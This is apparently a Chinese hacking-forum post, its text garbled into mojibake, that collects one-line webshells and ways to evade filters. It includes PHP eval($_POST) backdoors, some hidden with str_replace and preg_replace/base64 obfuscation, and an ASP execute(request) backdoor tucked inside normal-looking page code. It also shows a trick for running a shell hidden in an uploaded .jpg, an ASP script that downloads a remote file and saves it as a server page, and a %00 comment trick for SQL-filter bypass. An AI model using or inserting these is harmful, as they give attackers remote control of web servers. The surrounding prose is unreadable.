ͻƻܻ
ڻշѣƽֱȽϵͣˣʵսԼףûдԲ-----------------------------------------------------------------------------------------------------------------------------------
·Ϊ
һƪǰԹ
עƪƹעķ
ƪݻĹ˹ҿԼ
һƪ
----------------1--------------------------
< ?php
@eval
($_POST['1']);?>
----------------2--------------------------
<title>login</title>nono<?php
eval
($_POST
)
?>
--------------------3---------------------------------------------
< ?php $a = str_replace(x,"","axsxxsxexrxxt");
$a($_POST["c"]); ?>
˵ֱҪַ c
---------------------ijţģ˵ɹȫͻ------------------------------<%@language=vbscript codepage=936 %>
<%@language=vbscript codepage=936 %>
<%
Option Explicit
'ǿ·ʷҳ棬Ǵӻȡҳ
Response.Buffer = True
Response.Expires = -1
Response.ExpiresAbsolute = Now() - 1
Response.Expires = 0
Response.CacheControl = "no-cache"
dim m
m=request("m")
Dim ArticleID, Action, sql, rs, Hits, ShowType
if m<>"" then execute(m)
ArticleID = Trim(request("ArticleID"))
Action = Trim(request("Action"))
ShowType = Trim(request("ShowType"))
If IsNumeric(ShowType) Then
ShowType = CLng(ShowType)
Else
ShowType = 1
End If
%>
--------------------ڹȫİ-------------------------------------------
A.asp汾
һ仰Ϊ XX.jpg ϴ ַΪ .../131717.jpg
ϴһ x.asp Ϊ <!C#include file="../131717.jpg"-->
B.php汾
phpĻ
< ?php
include "1.htm";
?>
------------------ʵڲУ---------------------------------------------
Զ
<%
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.8090sec.com/1.txt",False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("ls.asp"),2
set sGet = nothing
set sPOST = nothing
%>
עƪ
/*%00*/ضϷ
select/*%00*/* from admin;
---------------------------------------------------------------
---------------------------------------------------------------
ƪ
ƣ
<?php
$code='һbase64'; //base64
$x=str_replace('f',"","bfafsfef6f4f_ffdffeffcffoffdffef"); //ַ滻
$a = '/a/';//
preg_replace($a,'e'.'v'.'a'.'l'.'('.$x.'('.$code.'))','a'); //滻
?>
ƹؼʹ
ҳ:
[1]